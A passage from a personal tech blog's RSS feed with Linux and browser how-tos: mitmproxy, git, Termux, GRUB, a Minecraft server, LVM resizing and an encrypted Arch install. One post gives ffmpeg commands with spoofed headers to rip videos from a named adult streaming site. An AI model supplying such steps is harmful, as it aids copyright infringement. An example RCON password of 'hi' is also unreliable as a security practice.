Tampermonkey is a customizable user script manager that allows you to add custom JavaScript to web pages. It can be used to enhance the functionality of websites, automate tasks, and modify the appearance of pages.

&gt;IMPORTANT: Based on my research, Tampermonkey is not open source; the latest source code I found on GitHub dates to 2018 (`Commits on Jun 5, 2018`), so it is effectively closed source.

![Tampermonkey](https://addons.mozilla.org/user-media/previews/thumbs/170/170870.jpg?modified=1622132485)

## Conclusion

These browser plug-ins can significantly improve the browsing experience for developers by providing tools for managing cookies, customizing web pages, and analyzing the technologies used on websites.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Firefox Plug-ins to Enhance Your Browsing Experience with Extra Features</title><link>https://ummit.dev//posts/browser/extensions/web-extensions-others/</link><guid isPermaLink="true">https://ummit.dev//posts/browser/extensions/web-extensions-others/</guid><description>Practical Firefox extensions for everyday browsing including tab management, image search, and YouTube enhancements.</description><pubDate>Mon, 25 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Today, we will explore a selection of browser plug-ins that can enhance your browsing experience. These plug-ins offer a range of features, from managing tabs and sessions to customizing web pages and analyzing website technologies. Let&apos;s dive in and discover how these plug-ins can improve your browsing efficiency and productivity.

### [Imagus](https://addons.mozilla.org/zh-TW/firefox/addon/imagus/)

Imagus enhances your browsing experience by allowing you to enlarge thumbnails on mouseover and view images/videos from links without clicking or opening a new page.

See the source code on [GitHub](https://github.com/Zren/chrome-extension-imagus).

![Imagus](https://addons.mozilla.org/user-media/previews/thumbs/126/126064.jpg?modified=1622132363)

### [Search by Image](https://addons.mozilla.org/zh-TW/firefox/addon/search_by_image/)

This robust image search tool supports multiple search engines, enabling you to search for information through images. Simply upload images or provide image URLs to find relevant information.

See the source code on [GitHub](https://github.com/dessant/search-by-image).

![Search by Image](https://addons.mozilla.org/user-media/previews/full/263/263054.png?modified=1635854423)

### [Simple Tab Groups](https://addons.mozilla.org/zh-TW/firefox/addon/simple-tab-groups/)

Organize and manage your browser tabs efficiently with Simple Tab Groups. Create, modify, and swiftly switch between different tab groups to enhance your work efficiency.

See the source code on [GitHub](https://github.com/drive4ik/simple-tab-groups).

![Simple Tab Groups](https://addons.mozilla.org/user-media/previews/thumbs/209/209871.jpg?modified=1622132830)

### [Tab Session Manager](https://addons.mozilla.org/zh-TW/firefox/addon/tab-session-manager/)

Save and restore the state of windows and tabs effortlessly with Tab Session Manager. It supports auto-save and cloud sync, simplifying the management of your browsing sessions.

See the source code on [GitHub](https://github.com/sienori/Tab-Session-Manager).

![Tab Session Manager](https://addons.mozilla.org/user-media/previews/thumbs/224/224507.jpg?modified=1622132782)

### [Tabby - Window Tab Manager](https://addons.mozilla.org/zh-TW/firefox/addon/tabby-window-tab-manager/)

Tabby streamlines the management of numerous windows and tabs. Quickly open, close, move, and pin tabs. For those who frequently work with 100+ tabs, Tabby is a must-have.

See the source code on [GitHub](https://github.com/Bill13579/tabby).

![Tabby](https://addons.mozilla.org/user-media/previews/thumbs/240/240529.jpg?modified=1622133220)

### [Undo Close Tab](https://addons.mozilla.org/zh-TW/firefox/addon/undoclosetabbutton/)

Restore recently closed tabs with a single click using Undo Close Tab. It provides a convenient context menu with a list of recently closed tabs.

See the source code on [GitHub](https://github.com/M-Reimer/undoclosetab).

### [Youtube Audio](https://addons.mozilla.org/en-US/firefox/addon/youtube-audio/)

Disable video and only play audio from YouTube videos with Youtube Audio. This plug-in is perfect for listening to music or podcasts without the need to watch the video.

See the source code on [GitHub](https://github.com/animeshkundu/youtube-audio).

![Youtube Audio](https://addons.mozilla.org/user-media/previews/full/179/179540.png?modified=1622132573)

### [YouTube NonStop](https://addons.mozilla.org/en-US/firefox/addon/youtube-nonstop)

YouTube NonStop automatically skips the &quot;Pause video. Continue watching?&quot; dialog, allowing you to watch YouTube videos without interruptions.

See the source code on [GitHub](https://github.com/lawfx/YoutubeNonStop).

![YouTube NonStop](https://addons.mozilla.org/user-media/previews/thumbs/209/209112.jpg?modified=1622133496)

## Conclusion

These browser plug-ins offer a variety of features to enhance your browsing experience. Whether you&apos;re looking to manage tabs, search for images, or streamline your browsing sessions, these plug-ins can help you work more efficiently and effectively. Try them out and discover how they can improve your browsing productivity.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Setting Up mitmproxy with Network Traffic Analysis</title><link>https://ummit.dev//posts/linux/tools/mitmproxy/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/mitmproxy/</guid><description>Intercept and analyze HTTP and HTTPS network traffic between browsers and servers using mitmproxy.</description><pubDate>Mon, 25 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

mitmproxy allows you to intercept and analyze network traffic between your browser and the internet. To set up mitmproxy with Firefox, you need to configure Firefox to use mitmproxy as a proxy. This enables mitmproxy to capture and display all HTTP and HTTPS requests made by Firefox.

## Downloading mitmproxy

1. Visit the official website at: https://mitmproxy.org/
2. Download the Linux Binary file.
3. Extract the tar.gz file with this command:

```shell
tar -xvf mitmproxy-10.1.6-linux-x86_64.tar.gz
```

### Firefox - Proxy Configuration

1. Open Firefox and go to the settings menu by clicking on the three horizontal lines in the upper right corner.

2. Select `Preferences` or `Options` from the menu.

3. In the Preferences or Options window, find and click on `General` in the left sidebar.

4. Scroll down to the `Network Settings` section.

5. Click on the `Settings...` button next to `Configure how Firefox connects to the internet.`

6. In the Connection Settings window, select `Manual proxy configuration.`

7. For both `HTTP Proxy` and `HTTPS Proxy`, enter `127.0.0.1` and set the port to `8080`. Leave `SOCKS Host` empty.

&gt; Tip: Alternatively, just check `Also use this proxy for HTTPS`.

8. Click `OK` to close the Connection Settings window.

### Running mitmproxy

There are a few ways to run mitmproxy. I recommend `mitmdump` for the terminal.

1. Open a terminal.

2. Navigate to the directory where mitmproxy is installed.

    ```shell
    cd mitmproxy-bin
    ```

3. Run mitmproxy by executing the following command:

   ```shell
   ./mitmdump
   ```

4. mitmproxy will start, and you will see information about the proxy, including the proxy address (e.g., `http://127.0.0.1:8080`).

5. Restart Firefox. To inspect HTTPS traffic, also install the mitmproxy CA certificate: browse to `http://mitm.it` through the proxy and follow the instructions for Firefox.

#### Viewing Traffic in mitmproxy

Browse the internet in Firefox; mitmproxy will capture and display the traffic in the terminal where it is running.

For instance:

```shell
❯ ./mitmdump
[04:16:58.699] HTTP(S) proxy listening at *:8080.
[04:18:41.772][127.0.0.1:54868] client connect
[04:18:41.774][127.0.0.1:54876] client connect
[04:18:41.884][127.0.0.1:54868] server connect github.com:443 (20.27.177.113:443)
```

#### Exit mitmproxy

To exit mitmproxy, press `Ctrl + C` in the terminal where mitmproxy is running.

## Conclusion

By following these steps, you have successfully configured Firefox to use mitmproxy as a proxy, allowing you to monitor and analyze the network traffic generated by your browser.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Copying Text to Clipboard with xclip in Linux</title><link>https://ummit.dev//posts/linux/tools/xclip/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/xclip/</guid><description>Use xclip command-line utility to efficiently copy file contents to clipboard in Linux terminal environments.</description><pubDate>Mon, 25 Dec 2023 00:00:00 GMT</pubDate><content:encoded># Overview

Copying text to the clipboard in Linux can be done efficiently using the `xclip` command-line utility. `xclip` allows you to manipulate the clipboard content, making it a handy tool for working in a terminal environment. In this article, we&apos;ll explore how to copy the contents of a file into the clipboard using `xclip`.

## Installing xclip

Before using `xclip`, ensure that it&apos;s installed on your Linux system. You can install it using your package manager. For example, if you&apos;re using pacman, the package manager for Arch Linux and its derivatives, run the following command:

```bash
sudo pacman -S xclip
```

Replace this with the appropriate command if you&apos;re using a different package manager.

## Copying File Contents to Clipboard

To copy the contents of a file into the clipboard, you can use the following `xclip` command:

```bash
xclip -sel c &lt; file_to_copy
```

Here, `file_to_copy` is the name of the file you want to copy. This command takes the content of the specified file and sends it to the clipboard.

Let&apos;s break down the components of the command:

- `xclip`: The main command for interacting with the X clipboard.
- `-sel c`: Specifies the selection type. In this case, it uses the &quot;clipboard&quot; selection. The clipboard is the part of the X server that deals with copy and paste operations.
- `&lt; file_to_copy`: Redirects the content of the specified file into the `xclip` command.

## Example Usage

Suppose you have a text file named `sample.txt`, and you want to copy its content to the clipboard. Here&apos;s how you would do it:

```bash
xclip -sel c &lt; sample.txt
```

After running this command, the content of `sample.txt` is now in your clipboard and ready to be pasted.

## Conclusion

Using `xclip` in Linux simplifies the process of copying file contents to the clipboard, especially when working in a terminal environment. Remember to adapt the command to your specific use case, and explore other features of `xclip` for more clipboard manipulation options.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Git: Wayback Commands</title><link>https://ummit.dev//posts/linux/tools/git/git-wayback-command/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/git/git-wayback-command/</guid><description>Essential Git commands for undoing commits, resetting changes, and managing repository history effectively.</description><pubDate>Mon, 25 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Overview

Git, the powerful version control system, is an indispensable tool for developers. Understanding its commands and workflows can greatly enhance your efficiency and productivity. In this blog, we&apos;ll explore some common and essential Git commands for various scenarios.

## 1. Undoing Commits: `git reset HEAD~`

Imagine making a commit that you want to undo. The `git reset HEAD~` command allows you to reset the current branch&apos;s HEAD to the previous commit, effectively undoing the last commit. Use this cautiously, especially if you&apos;ve already pushed changes.

```bash
git reset HEAD~
```
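A scratch-repository sketch of what this does (the file name is illustrative; the inline `-c` identity avoids touching your global config):

```shell
# Make two commits, undo the second, and observe that the
# file from the undone commit survives as an untracked file
repo=$(mktemp -d)
cd "$repo"
git init -q
git -c user.name=demo -c user.email=demo@example.com \
    commit --allow-empty -qm "first"
echo "hello" > file.txt
git add file.txt
git -c user.name=demo -c user.email=demo@example.com \
    commit -qm "second"
git reset HEAD~                    # undo "second"; file.txt survives
count=$(git rev-list --count HEAD)
echo "$count"                      # 1
git status --short                 # file.txt is back to untracked
```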

## 2. Force Pushing: `git push origin branch --force`

Force pushing is necessary when you&apos;ve made changes locally that conflict with the remote repository. This overwrites the remote branch with your local changes. Exercise caution with this command, especially on shared branches.

```bash
git push origin dev --force
```

## 3. Amending Commits: `git commit --amend`

The `--amend` option is used to modify the last commit. It combines staged changes with the previous commit, effectively allowing you to alter the commit message or add changes you forgot.

```bash
git commit --amend
```

This command opens your default text editor, allowing you to modify the commit message before saving, or to save it unchanged.

## 4. Viewing Commit History

To view a concise history of commits, use:

```shell
git log --oneline
```

This displays a list of commits, showing only the commit hash and commit message.

## 5. Hard Reset: `git reset --hard &lt;commit-hash&gt;`

A hard reset discards changes and moves the HEAD to a specific commit (hash). Use this when you want to discard all changes and move to a previous state.

```bash
git reset --hard c14809fa
```

## 6. Stashing Changes: `git stash`

Stashing is handy when you need to switch branches but have uncommitted changes. It saves your changes in a temporary area, allowing you to switch branches without committing.

```bash
git stash
```

## 7. Stashing Untracked Files: `git stash -u`

The `-u` option with `git stash` stashes untracked files along with changes. This is useful when you want to stash everything, including new files.

```bash
git stash -u
```
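The commands above only put work away; to bring it back, use `git stash pop` (or `git stash apply` to keep the stash entry). A minimal sketch in a scratch repository (names are illustrative):

```shell
# Stash an uncommitted change, then restore it with pop
repo=$(mktemp -d)
cd "$repo"
git init -q
echo "v1" > notes.txt
git add notes.txt
git -c user.name=demo -c user.email=demo@example.com \
    commit -qm "base"
echo "v2" > notes.txt          # uncommitted modification
git stash -q                   # working tree is clean again
before=$(cat notes.txt)        # v1, the committed content
git stash pop -q               # the modification comes back
after=$(cat notes.txt)         # v2
echo "before=$before after=$after"
```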

## Conclusion

These commands are foundational for effective Git workflows. However, exercise caution when using forceful commands, especially in shared repositories. Always ensure you understand the consequences of each command, and consider creating backups or branches before making significant changes. :DD</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Termux on Android: A Comprehensive Guide</title><link>https://ummit.dev//posts/mobile/android/tools/termux/</link><guid isPermaLink="true">https://ummit.dev//posts/mobile/android/tools/termux/</guid><description>Install and use Termux terminal emulator on Android for Linux-like command-line experience on mobile devices.</description><pubDate>Mon, 25 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Overview

Termux is a powerful terminal emulator for Android that brings a Linux-like command-line experience to your mobile device. In this guide, we&apos;ll walk through the installation process using F-Droid, setting up storage access, and exploring the basic functionality of Termux.

## Installing Termux from F-Droid

To install Termux on your Android device, follow these steps:

1. **Install F-Droid**: F-Droid is an open-source app store that hosts a variety of free and open-source applications, including Termux. Download the F-Droid APK from the [official website](https://f-droid.org/) and install it on your device, or grab it directly from [here](https://f-droid.org/F-Droid.apk).

2. **Search for Termux**: Once F-Droid is installed, open it, search for `Termux`, and install it.

3. **Grant Permissions**: After the installation is complete, launch Termux. You will be prompted to grant storage access. Allow them to proceed.

4. **Storage Access**: To access your device&apos;s storage from Termux, you need to grant permission. Run the following command in Termux :)

    ```bash
    termux-setup-storage
    ```

    Confirm the permission request when prompted.

## Getting Started with Termux

Now that you have Termux installed and storage access configured, you can start using it as a powerful terminal on your Android device. Here are some tips to help you get started.

### Basic Commands

Termux uses the `pkg` package manager (a wrapper around `apt`) to install and manage software packages.

Here are some basic commands to get you started:

- **Update Package List:**
    ```bash
    pkg update
    ```

- **Install a Package:**
    ```bash
    pkg install &lt;package_name&gt;
    ```

- **Accessing Storage**: With `termux-setup-storage`, you have granted access to your device&apos;s storage. You can navigate to the storage directory using the `cd` command:

    ```bash
    cd storage/shared
    ls
    ```

- **Full system upgrade**: In Termux, you don&apos;t need `sudo` to upgrade the system:

    ```bash
    apt update -y &amp;&amp; apt upgrade -y &amp;&amp; apt dist-upgrade -y
    ```

## Conclusion

Actually you can even install a full Linux distribution on your Android device using Termux and launch it using a VNC client. Termux is a versatile tool that can be used for various purposes, from running scripts to setting up a web server. It&apos;s a must-have app for anyone who wants to explore the world of command-line interfaces on their Android device.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Installing Multiple Kernels with GRUB on Arch Linux</title><link>https://ummit.dev//posts/linux/tools/boot-loader/grub/grub-multi-kernel/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/boot-loader/grub/grub-multi-kernel/</guid><description>Install and manage multiple Linux kernels on Arch Linux with GRUB bootloader for flexibility and compatibility.</description><pubDate>Mon, 25 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Overview

GRUB (Grand Unified Bootloader) is a popular bootloader used on many Linux distributions, including Arch Linux. Installing multiple kernels alongside GRUB allows you to choose which kernel version to boot into, providing flexibility and compatibility. In this guide, we&apos;ll walk through the process of installing multiple kernels on Arch Linux.

## Step 1: Install Kernels

Open your terminal and install the desired kernel versions. In this example, we&apos;ll install the regular Linux kernel, the LTS (Long-Term Support) kernel, and the Zen kernel.

```bash
sudo pacman -S linux linux-headers
sudo pacman -S linux-lts linux-lts-headers
sudo pacman -S linux-zen linux-zen-headers
```

These commands install the Linux, Linux LTS, and Linux Zen kernels along with their respective headers.

## Step 2: Generate GRUB Configuration

After installing the kernels and GRUB, generate the GRUB configuration file to include the new kernels:

```bash
sudo grub-mkconfig -o /boot/grub/grub.cfg
```

This command scans your system for installed kernels and generates a configuration file (`grub.cfg`) in the `/boot/grub/` directory.

## Step 3: Reboot

Reboot your system to apply the changes:

```bash
reboot
```

During the boot process, you&apos;ll now see a GRUB menu that allows you to choose the kernel version you want to boot into.

## Selecting Kernel during Boot

When your system starts, GRUB presents a menu where you can choose the kernel you want to boot. Use the arrow keys to navigate and press Enter to select a kernel.
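If you want GRUB to default to whichever kernel you selected on the previous boot, you can optionally set the following in `/etc/default/grub` and then re-run `grub-mkconfig`. This is a sketch assuming the stock defaults file:

```bash
# /etc/default/grub: remember the last selected menu entry
GRUB_DEFAULT=saved
GRUB_SAVEDEFAULT=true
```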

## Conclusion

Installing multiple kernels on Arch Linux with GRUB provides a safety net in case a new kernel version introduces compatibility issues. It allows you to choose a specific kernel version during the boot process, ensuring that you can always access your system. Experiment with different kernels to find the one that works best for your hardware and requirements.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>A Crash Guide to Bypassing HLS Encryption video with FFMPEG</title><link>https://ummit.dev//posts/linux/tools/ffmpeg/ffmpeg-dl-encrypted-hls-video/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/ffmpeg/ffmpeg-dl-encrypted-hls-video/</guid><description>Learn how to bypass HLS encryption and download videos using FFMPEG directly from the browser.</description><pubDate>Sun, 24 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

First of all, a very MERRY CHRISTMAS to everyone! 🎄🎁

As we embrace the festive spirit, this article kicks off with a practical guide, a valuable method to master when it comes to downloading videos.

we&apos;ll walk you through a direct approach using FFMPEG. Let&apos;s unwrap the steps!

## Required Tools

Before we dive in, ensure you have the following tools ready:

- `FFMPEG` (for downloading and remuxing the stream)
- Terminal (for executing commands)
- Browser (for extracting the essential URL)

### Arch Linux Users: Installing FFMPEG

```shell
sudo pacman -S ffmpeg
```

## Step 1: Uncover M3U8 Link and Copy It

Quick guidance:

1. Open your preferred browser.
2. Press `F12` (Inspect) on your keyboard.
3. Navigate to the `Network` tab.
4. Head over to the enchanting world of `Jable.tv`.
5. Find the video you want to download.
6. Type `m3u8` into &apos;Filter URLs&apos; to swiftly spot the URL. Once found, copy the M3U8 link.

### Can&apos;t Locate the URL?

If the M3U8 link eludes you, it could be a missed step. Try refreshing the URL with F5, replay the video, and you&apos;re sure to uncover it. Utilize the `Filter` feature with the value `m3u8` for efficient searching.

![find](./1.gif)

## Step 2: Spark the Video Download

When you spot `[https @ 000001947ece8180] Opening &apos;https://qmm-truts.mushroomtrack.com/hls/NFb_sIwTdg3IZ6FeEFo9-g/1656586701/0/108/1082.ts&apos; for reading`, rejoice! The reading is successful, and the download is underway.

```shell
ffmpeg -user_agent &quot;Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36&quot; -headers &quot;referer: https://jable.tv/&quot; -i &quot;https://qmm-truts.mushroomtrack.com/hls/NFb_sIwTdg3IZ6FeEFo9-g/1656586701/0/108/108.m3u8&quot; -c copy IPX-258.mp4
```

![find](./downloaded.png)

## Step 3: Download Enchantment - A Few Notes

While the download runs, the output file `IPX-258.mp4` appears in your directory and keeps growing as the segments are fetched. Don&apos;t be fooled into thinking it has stalled, and resist the urge to close the terminal midway; otherwise, you might need to restart the download. It finishes once every segment has been fetched.

### Full Download Demo Code (CAWD-091)

For those seeking a mesmerizing HLS video download, behold the sample code:

```shell
ffmpeg -user_agent &quot;User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0&quot; -headers &quot;Referer: https://jable.tv/&quot; -i &quot;https://record-smart.alonestreaming.com/hls/Jyz4bZStuyQzFk6168lSdA/1656587266/8000/8688/8688.m3u8&quot; -c copy CAWD-091.mp4
```

## Conclusion

Now you can download and enjoy your videos without any hassle. Enjoy! 🎉</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>A Comprehensive Guide for Setting Up a Minecraft Server</title><link>https://ummit.dev//posts/games/minecraft/via-vps-creating-your-own-24hr-minecraft-server/</link><guid isPermaLink="true">https://ummit.dev//posts/games/minecraft/via-vps-creating-your-own-24hr-minecraft-server/</guid><description>Step-by-step guide to setting up and running a 24/7 Minecraft Java Edition server on VPS.</description><pubDate>Thu, 21 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Running a Minecraft server on a VPS (Virtual Private Server) allows you to create a shared gaming experience for you and your friends. This guide covers the step-by-step process of setting up a Minecraft server on a VPS, focusing on key tools and configurations.

### Prerequisites:

- VPS Server with a minimum of 2GB RAM.
- SSH (Secure Shell) connection tool.
- Optional: Filezilla or SCP for file transfers.
- Java Edition server for Minecraft.
- Screen for running the server in the background.

## Step 1: Install SSH Connection Tool

Ensure that you have an SSH connection tool installed. Most Linux systems come with an SSH connection tool by default. If not, install it using the appropriate command for your system.

**Debian:**
```bash
sudo apt-get install ssh -y
```

**Arch:**
```bash
sudo pacman -S openssh
```

**Fedora:**
```bash
sudo dnf install openssh-clients
```

## Step 2: Log in to the SSH Server

Use the IP address of your VPS server to log in using SSH. Replace `your_server_ip` with the actual IP address.

```bash
ssh root@your_server_ip
```

## Step 3: Accept Port 22

Some VPS providers may deny port 22 by default. To prevent login issues in the future, accept connections on Port 22:

```bash
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
```

## Step 4: Update Package

Before installation, update the system&apos;s package information:

```bash
sudo apt update -y
sudo apt upgrade -y
sudo apt dist-upgrade -y
```

## Step 5: Install Java JDK

Install OpenJDK version 17, suitable for running Minecraft servers:

```bash
sudo apt install openjdk-17-jre-headless -y
```

## Step 6: Install Screen

Install Screen to run the server in the background:

```bash
sudo apt install screen -y
```

## Step 7: Download the Latest Minecraft Server

Download the latest Minecraft server file using `wget` or from the official website:

```bash
wget https://launcher.mojang.com/v1/objects/e00c4052dac1d59a1188b2aa9d5a87113aaf1122/server.jar
```

## Step 8: Set Up Firewall

Use `ufw` to enable and configure the firewall:

```bash
sudo ufw enable
sudo ufw allow 25565
```

## Step 9: Start the Server

Run the Minecraft server with the following command:

```bash
java -Xms1024M -Xmx1024M -jar server.jar nogui
```

## Step 10: Server Error

After the first run, you may encounter errors related to missing files. This is normal. The next steps will generate and modify the required files.

```bash
Starting net.minecraft.server.Main
[14:01:39] [ServerMain/INFO]: Building unoptimized datafixer
[14:01:42] [ServerMain/ERROR]: Failed to load properties from file: server.properties
[14:01:42] [ServerMain/WARN]: Failed to load eula.txt
[14:01:42] [ServerMain/INFO]: You need to agree to the EULA in order to run the server. Go to eula.txt for more info.
```

## Step 11: Modify eula.txt File

Edit `eula.txt` to change `eula=false` to `eula=true`:

```bash
nano eula.txt
```

## Step 12: Modify server.properties File

Edit `server.properties` to configure your server settings:

```bash
nano server.properties
```

Now make the following changes, for instance:

```bash
rcon.port=25575
rcon.password=hi
enable-rcon=true
```
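With RCON enabled, you can administer the server remotely. For example, with the third-party `mcrcon` client (assuming it is installed, and using the example credentials above; pick a stronger password in practice):

```bash
mcrcon -H 127.0.0.1 -P 25575 -p hi &quot;say Maintenance in 5 minutes&quot; list
```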

## Step 13: Use Screen to Keep the Server Running

Use `screen` to keep the server running in the background:

```bash
screen
java -Xms1024M -Xmx2048M -jar server.jar nogui
```

## Final Step: Enter Minecraft and Join the Server

1. Open Minecraft and go to &quot;Multiplayer.&quot;
2. Add your server&apos;s IP and click &quot;Done.&quot;
3. Click on your server and join. Enjoy the game!

![gameplay](./featured.png)

## Conclusion

Setting up a Minecraft server on a VPS provides a shared gaming environment for you and your friends. Following these steps ensures a smooth installation and configuration process. Enjoy your Minecraft adventure!

## References:

- [Shells Tutorial](https://www.shells.com/l/en-s/tutorial/0-guide-nstalling-A-linecraft-linux-ubuntu)
- [DigitalOcean Tutorial](https://www.digitalocean.com/community/tutorials/how-create-A--mincraft--ubuntu-20-04-tutorials)
- [Minecraft Server Error Fix](https://www.reddit.com/r/minecraft/comments/nv92fg/error_while_launcher_a_117_minecraft_server_fix/)

## File Download Websites:

- [Minecraft Versions](https://mcversions.net/)
- [Official Minecraft Server Download](https://www.minecraft.net/en-s/download/server)

## Author&apos;s Note

I am not a Minecraft player, and I only started playing it last month. I have previously hosted a CS1.6 Server, and I thought it might be similar, but I encountered various problems while writing this article. The main issue was that I couldn&apos;t run Minecraft due to insufficient RAM. I initially tried using 512MB of RAM, but it wasn&apos;t sufficient. Realizing the RAM was inadequate, I attempted again, this time upgrading to 1GB of RAM, but it still didn&apos;t work. Although the error messages were minor, a new error occurred after the last step. Finally, I used 2GB of RAM, and there were no more errors.

Minecraft is really resource-intensive and expensive to host.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Resizing LVM and LUKS Encrypted Btrfs Filesystem</title><link>https://ummit.dev//posts/linux/filesystem/lvm-luks-resizing-btrfs/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/filesystem/lvm-luks-resizing-btrfs/</guid><description>Learn how to safely resize Btrfs filesystems within LVM and LUKS encrypted storage setups.</description><pubDate>Thu, 21 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Managing disk space efficiently is crucial for maintaining a well-organized system. In this guide, we&apos;ll explore the steps to resize a Btrfs filesystem within an LVM and LUKS encrypted setup. This process involves reducing, extending, and fixing the size of the filesystem to meet your storage needs.

Btrfs also supports online resizing, so growing a filesystem needs no downtime. To shrink a mounted root filesystem, however, you may need to boot from a live ISO and perform the resize from there.

### Prerequisites

Before proceeding, ensure you have a basic understanding of LVM (Logical Volume Manager) and LUKS (Linux Unified Key Setup) encryption.

&gt;**And back up your DATA first!!!**

## Step 1: Reduce Btrfs Filesystem

To reduce the size of the Btrfs filesystem, use the `btrfs filesystem resize` command. Make sure to specify the target size and the mount point.

```bash
sudo btrfs filesystem resize -500G /mnt/home
```

Here, we reduce the filesystem mounted at `/mnt/home` by 500GB. Adjust the size as needed for your scenario.

## Step 2: Reduce LVM Logical Volume

To match the reduced Btrfs filesystem size, shrink the corresponding LVM logical volume. Use the `lvreduce` command with a leading minus sign to reduce the volume *by* the given amount, matching the 500GB removed from the filesystem:

```bash
sudo lvreduce -L -500G /dev/vol/home
```

Replace `/dev/vol/home` with the path to your logical volume. Be careful: the logical volume must never end up smaller than the filesystem it contains, or you will lose data.

## Step 3: Extend LVM Logical Volume

If you need to revert the changes or allocate additional space to the filesystem, use the `lvextend` command. This command allows you to increase the size of the LVM logical volume.

```bash
sudo lvextend -l +100%FREE /dev/vol/home
```

Here, we extend the logical volume to utilize all available free space. Adjust the logical volume path as needed.
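Note that `lvextend` only grows the container; the Btrfs filesystem inside still has to be grown to fill the new space. A sketch, assuming the volume is mounted at `/mnt/home`:

```bash
# Grow the Btrfs filesystem to fill the enlarged logical volume
sudo btrfs filesystem resize max /mnt/home
```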

## Step 4: Verification

To verify the changes, use the following commands:

- Verify Btrfs filesystem size:

```bash
sudo btrfs filesystem df /mnt/home
```

- Verify LVM logical volume size:

```bash
sudo lvdisplay /dev/vol/home
```

Ensure that the sizes align with your expectations.

## Conclusion

Resizing a Btrfs filesystem within an LVM and LUKS encrypted setup requires a careful and systematic approach. By following these steps, you can efficiently manage your storage space, whether you need to reduce, extend, or fix the size of the filesystem. Always double-check the sizes and perform these operations with caution to avoid data loss.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Full Disk Encryption with GRUB and Including /boot: Step-by-Step Guide</title><link>https://ummit.dev//posts/linux/distribution/archlinux/archlinux-luks1-grub-encryption-fully-install-systemd/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/distribution/archlinux/archlinux-luks1-grub-encryption-fully-install-systemd/</guid><description>Complete Arch Linux installation guide with full disk encryption using LUKS2, LVM, and GRUB bootloader.</description><pubDate>Thu, 21 Dec 2023 00:00:00 GMT</pubDate><content:encoded>&gt; **Note:** This is an updated installation method for the latest Arch Linux install.

## Guys! Arch Got an Update

**2026-01-13 12:00:00**

Today, I updated my Arch installation with a fresh install, but I encountered an issue where it gets stuck at loading `/dev/mapper/vol-root`. I did some research and asked my friends who use full disk encryption about it.

During that time, I learned that Arch recently updated something very important for FDE users. Here is the latest version of how to install with FDE on Arch.

For the latest reference, please see:

https://wiki.archlinux.org/title/Dm-crypt/System_configuration#rd.luks.name

## Introduction

systemd-boot doesn&apos;t support an encrypted `/boot`, but GRUB does. There are downsides, though: for example, GRUB cannot unlock LUKS2 volumes that use the Argon2id key derivation function.

&gt;Warning: GRUB&apos;s support for LUKS2 is still limited. You still need to use LUKS2 with PBKDF2 in order for booting to work.

### Step 1: Encrypt the Disk

To begin, encrypt your disk in LUKS2 format, avoiding the options GRUB cannot handle:

```shell
cryptsetup luksFormat --type luks2 --cipher aes-xts-plain64 --hash sha512 --pbkdf pbkdf2 --iter-time 5000 --key-size 512 --use-urandom --verify-passphrase /dev/nvme0n1p2
```

Ensure you answer `YES` when prompted. GRUB doesn&apos;t support the `--pbkdf argon2id` option, so it&apos;s crucial to stick with PBKDF2 for compatibility.

### Step 2: Open LUKS Device and Set Up Logical Volumes

After formatting, open the LUKS device and set up logical volumes using LVM (Logical Volume Manager):

```shell
cryptsetup open /dev/nvme0n1p2 crypt # Decrypt the disk and create a mapper named &apos;crypt&apos;

pvcreate /dev/mapper/crypt # Create a physical volume on the &apos;crypt&apos; mapper
vgcreate vol /dev/mapper/crypt # Create a volume group named &apos;vol&apos;

lvcreate -l 3%FREE vol -n swap # Create a logical volume named &apos;swap&apos; using 3% of the free space
lvcreate -l 50%FREE vol -n root # Create a logical volume named &apos;root&apos; using 50% of the remaining space
lvcreate -l 100%FREE vol -n home # Create a logical volume named &apos;home&apos; using all remaining space
```

Format the root and home volumes:

```shell
mkfs.btrfs /dev/vol/root
mkfs.btrfs /dev/vol/home
```

Create swap space:

```shell
mkswap /dev/vol/swap
swapon /dev/vol/swap
```

Mount the volumes:

```shell
mount /dev/vol/root /mnt
mkdir /mnt/home
mount /dev/vol/home /mnt/home
```

### Step 3: Prepare for GRUB Installation

GRUB supports EFI systems, so format the EFI system partition and mount it:

```shell
mkfs.fat -F32 /dev/nvme0n1p1
mount /dev/nvme0n1p1 --mkdir /mnt/boot/efi
```

Now, proceed with the essential package installations:

```shell
pacstrap -i /mnt base base-devel linux linux-firmware linux-headers lvm2 vim neovim networkmanager pipewire
```

Generate the `/etc/fstab` file:

```shell
genfstab -U /mnt &gt;&gt; /mnt/etc/fstab
```

The rest of the installation process is the same as a standard Arch Linux install!

If you are unfamiliar with the process, please refer to this article:

